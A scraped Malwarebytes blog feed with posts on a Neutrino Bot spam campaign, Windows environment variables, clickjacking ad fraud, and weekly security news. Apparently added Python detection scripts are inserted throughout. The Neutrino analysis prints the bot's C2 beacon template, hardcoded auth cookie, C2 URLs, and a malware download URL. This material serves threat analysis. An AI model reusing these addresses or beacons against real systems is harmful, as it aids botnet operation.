Techie Feeds

Post-holiday spam campaign delivers Neutrino Bot

Malwarebytes - Wed, 01/11/2017 - 16:00

This post was co-authored by @hasherezade and Jérôme Segura

During the Christmas season and early into the new year, we noticed a sharp decrease in spam volume, perhaps as online criminals took a break from their malicious activities and popped the champagne to celebrate. It could also have been a time to regroup and plan new strategies for the upcoming year.

In any case, over the weekend we observed a large new campaign purporting to be an email from ‘Microsoft Security Office’ with a link to a full security report (Microsoft.report.doc). This was somewhat unexpected, as typically the malicious Office files are directly attached to the email. Instead, the files are hosted on various servers with a short time-to-live window.

The booby-trapped document asks users to enable macros in order to launch the malicious code.

Neutrino Bot

If the macro executes, the final payload will be downloaded and executed. This is Neutrino bot – which we had analyzed over a year ago and that can:

  • perform DDoS attacks
  • capture keystrokes, do form grabbing, take screenshots
  • spoof DNS requests
  • download additional malware

Analyzed sample details

Once deployed, the sample installs itself in %APPDATA% in a folder called “UmJn”. This folder name is typical for the particular edition of Neutrino Bot:

It starts connecting to the C&C in order to fetch the commands and perform the malicious actions by querying a script called “tasks.php”.

The list of URLs is hardcoded in the bot in the form of a Base64 string:

URLs extracted from this sample:

http://saferunater.top/n/tasks.php
http://saferunater.xyz/n/tasks.php
http://saferunater.space/n/tasks.php
http://godomenbit.bit/n/tasks.php

Neutrino uses a very simple method of authentication – it sends a cookie with a hardcoded value:

POST %s HTTP/1.0
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded
Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
Content-length: %i

In the previously described version it was md5(“admin”). This time it is:

"bc00595440e801f8a5d2a2ad13b9791b" -> md5("just for fun")
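As an added example (not code from the Malwarebytes write-up or from the bot itself), the following Python script turns the traits described above into a triage check a defender can run over captured HTTP requests: the hardcoded `auth` cookie, the POST to `tasks.php`, the fixed User-Agent string, and a decoder for the Base64-wrapped list of task URLs. The captured request and the Base64 blob are constructed here from the format shown above; the benign request, the `ads.example`-free host list and the scoring threshold are assumptions of this example.

```python
import base64
import hashlib
import re

# User-Agent exactly as it appears in the bot's request template above.
NEUTRINO_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0"

# Cookie values the two analysed builds use as their only "authentication".
# The 5.x value is the one quoted in the analysis; the older one is md5("admin").
KNOWN_AUTH_COOKIES = {
    "bc00595440e801f8a5d2a2ad13b9791b": "Neutrino 5.x (analysed sample)",
    hashlib.md5(b"admin").hexdigest(): "Neutrino 3.9.x (leaked source)",
}


def phrase_reproduces_cookie(phrase: str, cookie_value: str) -> bool:
    """True when md5(phrase) equals a captured auth cookie value."""
    return hashlib.md5(phrase.encode()).hexdigest() == cookie_value.lower()


def decode_c2_list(blob_b64: str) -> list:
    """Decode a Base64-wrapped, whitespace-separated list of task URLs."""
    text = base64.b64decode(blob_b64).decode("utf-8", errors="replace")
    return [u for u in text.split() if u.startswith(("http://", "https://"))]


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, version and a header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def triage_request(raw: str) -> dict:
    """Score one captured request against the traits described in the analysis."""
    req = parse_http_request(raw)
    h = req["headers"]
    reasons = []
    m = re.search(r"(?:^|;\s*)auth=([0-9a-fA-F]{32})", h.get("cookie", ""))
    cookie_known = bool(m) and m.group(1).lower() in KNOWN_AUTH_COOKIES
    if cookie_known:
        reasons.append("known Neutrino auth cookie: " + KNOWN_AUTH_COOKIES[m.group(1).lower()])
    if req["method"] == "POST" and req["path"].endswith("/tasks.php"):
        reasons.append("POST to tasks.php task-polling endpoint")
    if h.get("user-agent") == NEUTRINO_UA:
        reasons.append("hardcoded User-Agent string")
    if req["version"] == "HTTP/1.0" and "content-type" in h:
        reasons.append("HTTP/1.0 POST, unusual for a current browser")
    # Threshold is an assumption: the cookie alone is decisive, otherwise two traits.
    return {"host": h.get("host", ""), "path": req["path"], "reasons": reasons,
            "suspicious": cookie_known or len(reasons) >= 2}


# Constructed capture following the template in the write-up; the host is one of the listed C2s.
SAMPLE_BEACON = (
    "POST /n/tasks.php HTTP/1.0\r\n"
    "Host: saferunater.top\r\n"
    "User-Agent: " + NEUTRINO_UA + "\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b\r\n"
    "Content-length: 0\r\n\r\n"
)

# Constructed benign request for contrast.
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/7.0\r\n\r\n"

# Constructed Base64 blob in the bot's format, built from URLs listed in the analysis.
SAMPLE_URL_BLOB = base64.b64encode(
    b"http://saferunater.top/n/tasks.php\nhttp://saferunater.xyz/n/tasks.php\n"
    b"http://godomenbit.bit/n/tasks.php").decode()

if __name__ == "__main__":
    print(decode_c2_list(SAMPLE_URL_BLOB))
    print(triage_request(SAMPLE_BEACON))
    print("md5('just for fun') matches cookie:",
          phrase_reproduces_cookie("just for fun", "bc00595440e801f8a5d2a2ad13b9791b"))
```

The cookie match is the strongest signal because the value is fixed across infections; the other traits are weak on their own, which is why the score requires two of them when the cookie is absent or rotated.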

While the goals of the bot and major features didn’t change much, the code seems to be partially rewritten in comparison to the leaked version 3.9.4.

Here is the old version, reporting to the CnC:

The new version – which seems to be 5.2 – is much less verbose. It doesn’t use any strings that would indicate the purpose of any particular value. Additionally, some of the functions used are loaded dynamically and identified by checksums, for the purpose of decreasing code readability:

The features are also reorganized. For example, there is still a feature of making screenshots of the victim’s desktop – but its implementation details have changed:

Screen grabbing is triggered by a command from the C&C:

The created screenshot is immediately sent to the C&C.

In the past, the same feature was implemented along with the keylogger.

The responsible thread is deployed, and screenshots are taken periodically and saved to the logs along with other grabbed content. When the logs’ size exceeds a defined threshold, they are uploaded to the C&C:

The implemented changes improved code quality by separating the individual features and give the operator more control over their execution. The code is still not obfuscated, but the authors tried to hide the strings that would explicitly reveal the purpose of particular commands.

Just like in the previous case, we are dealing with a fully-fledged multipurpose bot, with various features that allow it to steal data and invade privacy, but also to use infected computers for DDoS attacks or to download other malware.

Protection

It is important to remember to be particularly careful with Office documents masquerading as invoices, or other such reports that leverage the macro feature to execute code that will download and retrieve the actual payload. As an end user, do not enable macros unless you completely trust the file or are running it in a virtualized environment. As an IT admin, you can set policies to permanently disable macros.

Malwarebytes users are protected from this threat via the web or exploit protection modules.

IOCs:

Malicious doc:

agranfoundation[.]org/Microsoft[.]report[.]doc
xn--hastabakc-2pbb[.]net/Microsoft[.]report[.]doc
ecpi[.]ro/Microsoft[.]report[.]doc
ilkhaberadana[.]com/Microsoft[.]report[.]doc
cincote[.]com/Microsoft[.]report[.]doc
mallsofjeddah[.]com/Microsoft[.]report[.]doc
dianasoligorsk[.]by/Microsoft[.]report[.]doc

8dd66dd191c9f0d2f4b5407e5d94e815e8007a3de21ab16de49be87ea8a92e8d

Neutrino bot:

www.endclothing[.]cu[.]cc/nn.exe

87b7e57140e790b6602c461472ddc07abf66d07a3f534cdf293d4b73922406fe
b1ae6fc1b97db5a43327a3d7241d1e55b20108f00eb27c1b8aa855f92f71cb4b
ca64848f4c090846a94e0d128489b80b452e8c89c48e16a149d73ffe58b6b111

Categories: Techie Feeds

Explained: Environmental variables

Malwarebytes - Tue, 01/10/2017 - 19:07

Sometimes when you are looking for instructions to troubleshoot software issues or adapt software to your liking and you are looking at the knowledge base (KB) of said software, you will run into the use of environmental variables. Environmental variables are a Windows feature that describe certain important machine characteristics. These characteristics can be different for every machine, but they are very important when describing the path to certain files and folders. Not only can they vary from one machine to another, some are even different for other users of the same system.

Well-known examples of environmental variables are %COMPUTERNAME% and %USERNAME%. The notation – surrounded by percentage signs – tells you that an environmental variable is the object of the description. You can get a quick view of the variables that are preset on your system by using the following command in the command prompt: set.

This will result in a listing similar to this one:

Note that the variables themselves will be listed without the %% signs.

You can use Powershell to get a prettier version of the same list. The command to use is dir env: (see the header of this article for a part of that list).

Another way to access and change environmental variables is by visiting the Control Panel > System and Security > System screen. Select Advanced System Settings and on the Advanced tab, you should see a button labeled Environmental Variables… Click that button and you will see your environmental variables split out in User variables and System variables.

Here you can add, edit, and delete entries, but please be careful when doing so. Some of them are very much needed just the way they are and you can wreak havoc by making the wrong choices.

You may also notice that some programs you have installed add their own environmental variables to the “set-list”. We will focus on the standard Windows environmental variables as those are often used to locate certain files and folders. But in the KB articles we mentioned earlier, you may find that they use the environmental variables created by their own installer as well.

One way of testing what all these environmental variables mean is to paste or type them in a run command. Try it for example with %APPDATA%, which is an environmental variable that you will find in a lot of KB type of articles.

On a standard Windows 7 system, typing %APPDATA% takes you to the C:\Users\%USERNAME%\AppData\Roaming folder location. This is exactly why environmental variables are useful: if the folder with that function is in a different location on your computer, it automatically takes you to that location. If you type %APPDATA% on a default Windows XP system, it opens C:\Documents and Settings\%USERNAME%\Application Data folder location.

Of course, environmental variables are not only used to make KB articles more widely usable. They are also used in batch files and other programs. This saves system administrators a lot of work, as they can use the same script for several computers, for example by utilizing the %COMPUTERNAME% and %USERNAME% variables. Please note that %USERNAME% relates to the currently logged on user and not to other users of the same system.
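An added example, not part of the original post: a small Python expander for the %NAME% notation, run against constructed Windows 7 and Windows XP environment maps that use the folder paths the article names. It shows the point made above, that one template resolves to different folders on different systems, and it leaves unknown names untouched so a script can report what it could not resolve. The last helper resolves a template for several user profiles at once, which is what you want when checking a path such as %APPDATA%\UmJn (the folder from the Neutrino post above) for every user rather than only the one logged on. The user names, machine name and helper names are assumptions of the example.

```python
import re

# Constructed environment maps mirroring the folder layouts the article names;
# real machines differ, which is exactly why templates use the variables.
WIN7_ENV = {
    "USERNAME": "alice",
    "COMPUTERNAME": "WS-0042",
    "USERPROFILE": r"C:\Users\alice",
    "APPDATA": r"C:\Users\alice\AppData\Roaming",
}
WINXP_ENV = {
    "USERNAME": "alice",
    "COMPUTERNAME": "WS-0042",
    "USERPROFILE": r"C:\Documents and Settings\alice",
    "APPDATA": r"C:\Documents and Settings\alice\Application Data",
}

# A variable reference is a name between two percent signs, with no percent inside.
_VAR = re.compile(r"%([^%]+)%")


def expand(template: str, env: dict) -> str:
    """Replace each %NAME% with env[NAME]; names match case-insensitively, as
    Windows does. Unknown names are left exactly as written so the caller can
    see what did not resolve; a lone percent sign, as in "100%", is left alone."""
    lookup = {k.upper(): v for k, v in env.items()}
    return _VAR.sub(lambda m: lookup.get(m.group(1).upper(), m.group(0)), template)


def unresolved(template: str, env: dict) -> list:
    """Names referenced by the template that the environment does not define."""
    known = {k.upper() for k in env}
    return [name for name in _VAR.findall(template) if name.upper() not in known]


def expand_for_profiles(template: str, base_env: dict, usernames: list) -> dict:
    """Resolve one template for several user profiles on the same machine by
    rewriting the per-user variables (assumed here to be USERNAME, USERPROFILE
    and APPDATA) from the currently logged-on user's values."""
    out = {}
    for user in usernames:
        env = dict(base_env)
        for key in ("USERNAME", "USERPROFILE", "APPDATA"):
            env[key] = base_env[key].replace(base_env["USERNAME"], user)
        out[user] = expand(template, env)
    return out


if __name__ == "__main__":
    for label, env in (("Windows 7", WIN7_ENV), ("Windows XP", WINXP_ENV)):
        print(label, "->", expand(r"%APPDATA%\UmJn", env))
    print(expand_for_profiles(r"%APPDATA%\UmJn", WIN7_ENV, ["alice", "bob"]))
    print("unresolved:", unresolved(r"%APPDATA%\%PROGRAMDATA%", WIN7_ENV))
```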

Summary

This post is intended to make normal users aware of the existence and use of environmental variables, a Windows feature that is often only known to programmers and other advanced users.


Pieter Arntz


Clickjacking campaign abuses Google Adsense, avoids ad fraud bots

Malwarebytes - Tue, 01/10/2017 - 15:51

Ad fraud is one of many issues that contribute to the ad industry’s negative image these days. Unlike malvertising which affects end users by infecting them with malware, ad fraud costs advertisers billions of dollars in adverts that were never seen by real humans.

The case we are describing today shows some interesting tricks to have people click on camouflaged adverts while thinking they are clicking on the play button of a video. The ultimate goal is to generate pay per impression and pay per click revenues from what looks like clean and trusted traffic.

In addition, the crooks are tracking the movements and clicks of the mouse while the user is on the fraudulent page, in order to be able to tell if their victim is an actual person or simply a bot. If the latter is detected, the page will automatically redirect to google.com to prevent any accidental and ‘tainted’ click on the advert.

Apparently the bad guys are concerned about ad fraud too when it matters to them…

Different means, same end goal

There are different ways criminals go about profiting from ad fraud, the most common one being via compromised computers (bots) that view or click on ads unbeknownst to their users. Malware like Bedep can mimic real user activity in hidden desktops and defraud millions of ad impressions a day.

Late last year White Ops, a company that specializes in ad fraud research, exposed a large operation dubbed Methbot involving a different method to generate millions in fraudulent ad revenues. Rather than relying on end user machines, the crooks leveraged data centers to create bot farms. Why bother with unreliable consumer PCs when you can create an army of well-trained ad fraud bots running at optimal speed on server racks?

There are many other ways to game the ad ecosystem, and they don’t always involve infecting machines or using bot farms. Sometimes ad fraud can be done in a very transparent manner that relies on a real human to perform an action, making it harder for anti-fraud systems to detect. For instance, clickjacking, a technique that consists of tricking the user into clicking something that actually produces a hidden malicious action, has been used in the past to do click fraud.

The case we are going to have a look at today is actually related to a clickjacking attack we wrote about before. We discovered this ad fraud campaign via a high profile malvertising chain we have come across already that typically redirects to exploit kits. Visitors to a high traffic adult site are automatically redirected to what appears to be another adult streaming video page. What they don’t know is that it is completely fake and that underneath it are websites displaying paid adverts, generating the crooks money for each impression and click.

Gates

The scenario here is that traffic to some popular adult websites gets redirected via malicious advertising to one of several fake blogs, with topics ranging from wedding tips to pest control and appliances.

The redirection chain includes the mandatory passage through what we call a gate whose objective is typically to inspect incoming traffic and take actions.

Within one of those gates, we noticed interesting bits of code meant to “fingerprint” visitors, collecting their IP address, User-Agent, and screen resolution via a POST request upon the initial redirection from malvertising.

Figure 1: Fingerprinting code at the gate

This information is typically harvested by most websites for stats and optimization purposes, but given the explicit use of an appropriately named getfingerprint.php file, we can assume that the fraudsters were trying to identify real users versus crawlers or repeated visits of the same page.

Figure 2: Web traffic from malvertising to gate

A façade: adult gallery hides fake blog

Content is one of those things that is very important to search engines and other crawlers as it ultimately gives more value to a website. A long time ago, blackhat SEO criminals used a technique known as keyword stuffing which aimed at getting the site ranked high in the search engine result pages (SERP), but it is easy to detect nowadays.

Plagiarism is still very effective, and copy and paste has never been easier. It’s a cheap way to get some decent content with little effort. In this particular campaign, we witnessed several websites that had been created recently and filled with new blog entries.

It didn’t take long to find out where the write-ups were stolen from: mainly sites like Ezine or Pinterest. The thieves didn’t even bother changing any of the wording, they simply did a copy/paste to populate each of their fraudulent website with dozens of entries.

Figure 3: A fake blog about weddings with stolen content

Figure 4: Original content used by fake blog found on Ezine

If you visited one of those sites directly, you would see what seems to be a site giving advice for weddings, accompanied by a few adverts powered by Google’s DoubleClick, which is quite typical for any website that needs to pay for its operating costs. However, most likely only crawlers visited those websites directly, as the motive for setting them up was very clear: to defraud advertisers via hijacked traffic.

A layer containing adult images is superimposed such that both layers are rendered by the browser, but only the top layer (adult material) is visible to the eye.

Figure 5: The wedding blog turned into an adult portal thanks to an overlay

This is important because the crooks want to load the underlying blog and its content which includes paid adverts so that they can monetize on ad impressions, while at the same time tricking visitors into thinking they are still accessing their adult videos.

Figure 6: Diagram of ad impression fraud via adult page overlay

Figure 7: Web traffic from gate to fake blog, to advert

Stealing (real) users’ clicks

The first stage of this ad fraud campaign consisted of showing a thumbnail of adult videos while displaying hidden adverts, but that is not all. Users are conned into clicking to actually view any particular video, which takes us to the second part, that involves Pay Per Click (PPC) fraud.

The user is presented with a single adult video page but there is no actual video to be played, as it is just a screenshot designed to mimic a video player with the play button and timeline bar.

The goal is to get users to click on a hidden advert, but only after some validation checks that ensure the clicks are from genuine humans. This is somewhat ironic for fraudsters to check against bots.

Figure 8: Diagram of fake video page which tricks the user into clicking the play button

Figure 9: The hidden advert revealed with its placement over the video’s play button

One can actually show the hidden advert (as seen in Figure 9) simply by clicking in the browser’s address bar, which brings the banner to the forefront. Similarly, giving focus back to the page by clicking anywhere in it puts the banner back into hidden mode again.
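As an added example rather than anything from the article or the campaign, the Python scanner below applies the two overlay patterns described here to a page's HTML: a frame buried under a positioned element with a higher z-index (impression fraud through an overlay, as in Figures 5 and 6), and a frame made transparent with opacity:0 parked over a control (the hidden click target of Figure 9). It reads inline styles only, so a real audit would first resolve stylesheets; the sample page, its element ids and the ads.example URLs are constructed for the example.

```python
from html.parser import HTMLParser
import re

PX = re.compile(r"(-?\d+(?:\.\d+)?)px")


def parse_style(style: str) -> dict:
    """Turn an inline style attribute into a {property: value} map (lower-cased)."""
    out = {}
    for decl in style.split(";"):
        if ":" in decl:
            prop, val = decl.split(":", 1)
            out[prop.strip().lower()] = val.strip().lower()
    return out


def px(value, default=None):
    """Parse a pixel length such as '640px'; anything else yields the default."""
    m = PX.fullmatch(value or "")
    return float(m.group(1)) if m else default


class _Collector(HTMLParser):
    """Record every element with its tag, id, src, parsed style, box and z-index."""
    def __init__(self):
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        st = parse_style(a.get("style", ""))
        box = None
        # Only positioned elements with explicit geometry get a box we can compare.
        if st.get("position") in ("absolute", "fixed") and all(
                px(st.get(k)) is not None for k in ("left", "top", "width", "height")):
            box = (px(st["left"]), px(st["top"]), px(st["width"]), px(st["height"]))
        z = st.get("z-index", "")
        self.elements.append({"tag": tag, "id": a.get("id", ""), "src": a.get("src", ""),
                              "style": st, "box": box,
                              "z": int(z) if z.lstrip("-").isdigit() else 0})


def _overlap(a, b) -> bool:
    ax, ay, aw, ah = a
    bx, by, bw, bh = b
    return ax < bx + bw and bx < ax + aw and ay < by + bh and by < ay + ah


def find_overlay_frames(html: str) -> list:
    """Return (frame label, reason) pairs for frames that are transparent or
    that sit under a positioned element with a higher z-index covering them."""
    c = _Collector()
    c.feed(html)
    findings = []
    for f in (e for e in c.elements if e["tag"] == "iframe"):
        label = f["id"] or f["src"]
        try:
            opacity = float(f["style"].get("opacity", "1"))
        except ValueError:
            opacity = 1.0
        if opacity <= 0.05:
            findings.append((label, "transparent frame (opacity %g)" % opacity))
        if f["box"]:
            for e in c.elements:
                if e is not f and e["box"] and e["z"] > f["z"] and _overlap(e["box"], f["box"]):
                    findings.append((label, "covered by #%s (z-index %d)" % (e["id"] or e["tag"], e["z"])))
    return findings


# Constructed page in the shape the write-up describes: an ad frame under a full-size
# image overlay, a fake player image, and a transparent ad frame over its play button.
SAMPLE_HTML = """
<div id="blog">
  <iframe id="ad-top" src="https://ads.example/banner" style="position:absolute; left:0px; top:0px; width:728px; height:90px; z-index:1"></iframe>
  <p>Wedding tips copied from elsewhere...</p>
</div>
<div id="overlay" style="position:absolute; left:0px; top:0px; width:1200px; height:900px; z-index:10; background:url(gallery.jpg)"></div>
<img id="fake-player" src="player.png" style="position:absolute; left:400px; top:300px; width:640px; height:360px">
<iframe id="ad-play" src="https://ads.example/banner2" style="position:absolute; left:690px; top:460px; width:60px; height:60px; opacity:0; z-index:20"></iframe>
<iframe id="ad-legit" src="https://ads.example/sidebar" style="width:300px; height:250px"></iframe>
"""

if __name__ == "__main__":
    for label, reason in find_overlay_frames(SAMPLE_HTML):
        print(label, "->", reason)
```

The sidebar frame is reported clean because it is neither covered nor transparent; the two flagged frames correspond to the impression-fraud and click-fraud layers respectively.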

The crooks use JavaScript code to check for user activity, in particular mouse movements and clicks. Indeed, bots often perform very programmatic and predictable actions that can be detected as patterns of non-human activity. The detector.js script from the fake blog attempts to detect those emulated actions and immediately redirects the browser to Google’s homepage if it identifies any.

Figure 10: Checking for mouse activity to ensure clicks are legitimate

For instance, if a click is detected but the mouse hasn’t moved at all, this is suspicious behaviour. The same goes for the mouse moving to specific onscreen coordinates at particular time frames. Malware that tries to emulate user activity will typically perform some scrolls or clicks on screen, but those are usually not very random or unique, and they get repeated from one infected machine to another.
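The same mouse-activity checks are what an ad network's anti-fraud side uses to separate synthetic clicks from human ones. As an added example, not the campaign's detector.js or any Malwarebytes code, this Python module scores constructed event sessions on the heuristics described above: a click with no prior movement, a jump straight to the target, moves arriving at a fixed timer interval, and the same relative trajectory replayed across sessions. The event format, the thresholds and the sample sessions are assumptions of the example.

```python
from collections import Counter
import hashlib


def session_flags(events: list) -> list:
    """Events are (t_ms, kind, x, y) tuples in time order; kind is 'move' or 'click'.
    Returns human-readable reasons why the session looks scripted."""
    flags = []
    moves = [e for e in events if e[1] == "move"]
    clicks = [e for e in events if e[1] == "click"]
    for t, _, x, y in clicks:
        prior = [m for m in moves if m[0] < t]
        if not prior:
            flags.append("click at t=%d with no prior mouse movement" % t)
            continue
        # A human path wanders; a scripted one jumps to the target in one step.
        if len(prior) < 3:
            flags.append("click at t=%d after only %d move event(s)" % (t, len(prior)))
    # Identical gaps between move events point to a timer loop, not a hand on a mouse.
    gaps = [b[0] - a[0] for a, b in zip(moves, moves[1:])]
    if len(gaps) >= 4 and len(set(gaps)) == 1:
        flags.append("mouse moves at a fixed %d ms interval" % gaps[0])
    return flags


def trajectory_fingerprint(events: list) -> str:
    """Hash of the relative move path, so the same replayed path matches across
    sessions even when the starting coordinates differ."""
    moves = [(x, y) for _, k, x, y in events if k == "move"]
    deltas = [(bx - ax, by - ay) for (ax, ay), (bx, by) in zip(moves, moves[1:])]
    return hashlib.sha256(repr(deltas).encode()).hexdigest()[:16]


def replayed_sessions(sessions: dict) -> list:
    """Fingerprints seen in more than one session of the given {name: events} map."""
    counts = Counter(trajectory_fingerprint(ev) for ev in sessions.values())
    return [fp for fp, n in counts.items() if n > 1]


# Constructed sessions (times in milliseconds).
HUMAN = [(0, "move", 10, 20), (35, "move", 40, 60), (90, "move", 120, 130),
         (140, "move", 200, 160), (230, "move", 311, 208), (260, "click", 311, 208)]
BOT_NO_MOVE = [(0, "click", 311, 208)]
BOT_TELEPORT = [(0, "move", 311, 208), (50, "click", 311, 208)]
BOT_TIMER = [(0, "move", 0, 0), (100, "move", 50, 50), (200, "move", 100, 100),
             (300, "move", 150, 150), (400, "move", 200, 200), (450, "click", 200, 200)]
# Two "machines" replaying the same relative path from different start points.
SESSIONS = {
    "machine-a": BOT_TIMER,
    "machine-b": [(t, k, x + 300, y + 40) for t, k, x, y in BOT_TIMER],
    "human": HUMAN,
}

if __name__ == "__main__":
    for name, ev in (("human", HUMAN), ("no-move", BOT_NO_MOVE),
                     ("teleport", BOT_TELEPORT), ("timer", BOT_TIMER)):
        print(name, session_flags(ev))
    print("replayed paths:", replayed_sessions(SESSIONS))
```

The per-session checks catch the crude emulators; the cross-session fingerprint is what exposes a bot fleet, since a single replayed trajectory is plausible once but not on hundreds of machines.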

Online criminals make money by exploiting weaknesses in systems and people, which makes them very aware of certain pitfalls that they need to avoid. We have seen in the past malware closing the security hole that allowed it to get in, or even removing a previous infection. Similarly, when it comes to ad fraud, the bad guys know very well how to ensure they are getting paid while having less chance of getting caught.

The script also clears the browser’s back-button URL history, such that the user cannot revisit the same page again:

Figure 11: Changing the ‘back URL’ based on mouse activity

If a real human clicked to view the non-existing video, they actually clicked on the hidden ad, thereby generating money for the crooks. Whoever got duped will soon realize that this was just a waste of time and that no video actually loaded. Users are less likely to report on this fraud due to the nature of the content they were trying to view.

In the meantime, the fraudsters behind this operation are making money for each view and click. Given that they only have to pay for cheap incoming traffic versus the more expensive Google Ads, this is a profitable business model.

Figure 12: Web traffic from fake blog to click fraud

Link with previous campaign

In January of 2016, we wrote about a clickjacking attack taking advantage of the new European law on browser cookies. Similarly, users were tricked into clicking on ‘I accept cookies’ which actually clicked on an ad banner and defrauded legitimate advertisers.

The domain names used then and now have a similar pattern with the word ‘webhosting’ in it, which could be a coincidence of course, but is noteworthy since both campaigns use clickjacking to abuse Google AdSense.

Figure 13: Traffic capture from the European cookie clickjacking campaign

Another interesting aspect is the use of filters (i.e. filter.php, process.php) to weed out bots or machines that are already blacklisted. This was not something we had covered in our original blog post but by comparing with past captures, we can see the idea is very similar, although not as sophisticated.

Closing thoughts

There aren’t many industries that generate as many heated debates as the ad industry does. One argument that you will often hear is that ad agencies, networks and publishers still make money whether an ad is malicious or never was actually viewed by anyone. There is also a direct correlation between digital ad spend and ad fraud over the past few years.

This does not mean that the involved parties are desensitized to malware or fraud (they invest a lot of resources to combat that problem). In fact, treating them as ‘they’ is a poor choice since it assumes everyone is on the same level. We know that there are some networks/publishers that turn a blind eye – or worse – are directly affiliated with criminal gangs, while others are actually taking an active stance to fight malware and fraud.

The problem remains that there is an ever growing concern from both users (adopting ad blockers at a fast pace) and advertisers, getting less and less bang for their buck. Just like with malvertising, as long as there is an economic gain, criminals will keep on pursuing their abuse to exploit advertising as a unique and profitable fraud and infection vector.

We have notified Google and passed along the necessary information about this abuse of their ad platform.

IOCs:

Gates:

stockwebhosting[.]com
doctorwebhosting[.]com
triwebhosting[.]com
webhostingfashion[.]com

Fake blogs:

justhappymarriage[.]com
myamericansofa[.]com
instaautohire[.]com
bugcurb[.]com
bestautotariff[.]com
pestdomination[.]com
pleasedwedding[.]com
nicewashing[.]com
theusaappliance[.]com
topcaraccidentals[.]com
perfectpurification[.]com


A week in security (Jan 01 – Jan 07)

Malwarebytes - Mon, 01/09/2017 - 21:49

Last week, we pushed out an in-depth analysis of a Sundown exploit kit campaign dropping a miner for the cryptocurrency, Monero. Our researchers, hasherezade and Jérôme Segura, analyzed the kit and its payload during their investigation.

We also pushed out a report on a technical support page we found that performed a DoS attack against Mac systems. The said page did this by creating a multitude of email drafts, upon users visiting the fake site, that inundated the desktop, which in turn caused the entire system to freeze and run out of memory, rendering it unusable.

Below are notable news stories and security-related happenings:

  • Pokemon, Go? Augmented Reality Technology Faces Legal Reckonings In 2017. “While not a new technology, augmented reality (AR) became mainstream worldwide phenomena in 2016. But like any untested consumer technology, it faces fine-tuning to adopt to the laws and society around which it seeks to transform. One of the best examples is Niantic’s Pokémon Go AR game, a seminal platform launched in 2016 which uses AR technology to superimpose interactive Pokémon characters onto what a user’s mobile phone’s video camera captures. In addition to wide fame and success, the game has also run into an array of unique lawsuits.” (Source: LegalTech News)
  • Smart Devices May Soon Provide UK Police With Evidence Of Crime – Report. “Smart home devices, including fridges, washing machines, light bulbs and coffee-makers may soon provide police forces across the UK with critical data, linked to criminal investigations. Authorities believe that the internet-of-things (IoT) devices could potentially be used by detectives to gather digital crime scene evidence. According to Scotland Yard’s digital forensics chief Mark Stokes, IoT devices are likely to revolutionise crime-scene investigation. Detectives are being trained to identify digital footprints, which may help track events, in turn allowing authorities to establish the validity of alibis or root out inconsistencies in witnesses’ statements.” (Source: The International Business Times)
  • Data Breach Exposes US Army Doctor Details. “Sensitive details of health workers employed by the US military’s Special Operations Command (Socom) have been exposed in a data breach. The 11GB of data included social security numbers, names, addresses and salaries of some Socom staff.” (Source: The BBC)
  • Ransomware On Smart TVs Is Here And Removing It Can Be A Pain. “It took a year from proof of concept to in-the-wild attack, but ransomware for Android-based smart TVs is now here. As one victim discovered this Christmas, figuring out how to clean such an infection can be quite difficult. Ransomware for Android phones has already been around for several years and security experts have warned in the past that it’s only a matter of time until such malicious programs start affecting smart TVs, especially since some of them also run Android.” (Source: PC World)
  • Hackers Could Turn Your Smart Meter Into A Bomb And Blow Your Family To Smithereens – New Claim. “Smart meters are “dangerously insecure,” according to researcher Netanel Rubin – who claimed the gear uses weak encryption, relies on easily pwned protocols, and can be programmed to explode. The software vulnerability hunter derided global efforts to roll out the meters as reckless, saying the ‘dangerous’ devices are a risk to all connected smart home devices.” (Source: The Register)
  • Mind How You Grumble On Social Media: Crooks On Twitter Stealing Bank Details Of Customers Complaining About Glitches Online. “Savers who use social media to complain to their banks about technical glitches are having their details snatched by crooks. Criminals are lurking online waiting for banks to suffer technical problems so they can dupe unwitting customers into handing over information.” (Source: This is Money)
  • Ransomware Crime Bill Goes Into Effect In California. “Beware perpetrators of ransomware in California: Under a new bill that went into effect on Jan.1, you will now face four years in a state prison. Senate Bill 1137, which was signed in September, took effect on the first of the year. It updates the state’s penal code to differentiate the crime of ransomware from existing extortion statutes. Ransomware is generally malware downloaded into a computer or network that enables cyberthieves to lock systems up until a ransom is paid, usually via Bitcoin.” (Source: SC Magazine)
  • 54% Of Organizations Have Not Advanced Their GDPR Compliance Readiness. “More than half of organizations have failed to begin any work on meeting minimum General Data Protection Regulation (GDPR) compliance, according to a study conducted by Vanson Bourne. Intended to harmonize data security, retention and governance legislation across European Union (EU) member states, GDPR requires greater oversight of where and how sensitive data—including personal, credit card, banking and health information—is stored and transferred, and how access to it is policed and audited by organizations. GDPR will not only affect companies within the EU, but extend globally to the U.S. and other countries, impacting any company that conducts business in the region or with an EU organization.” (Source: Help Net Security)
  • Thai Army To Recruit Civilian ‘Cyber Warriors’ Following Anonymous’ Onslaught On Government Sites. “The Thai army is reportedly planning to recruit civilian “cyber warriors” in efforts to boost the government’s ability to respond to cyber threats. Civilian experts are slated to be employed to assist the government in combating cybercrime, as well as help the government improve its systems, according to reports. Thai army commander-in-chief Chalermchai Sittisat said: ‘We don’t have enough personnel with expertise in cyber security. Therefore, we need to recruit civilians for our centre, who can manage it properly and earn a reasonable salary,’ the Bangkok Post reported.” (Source: The International Business Times)
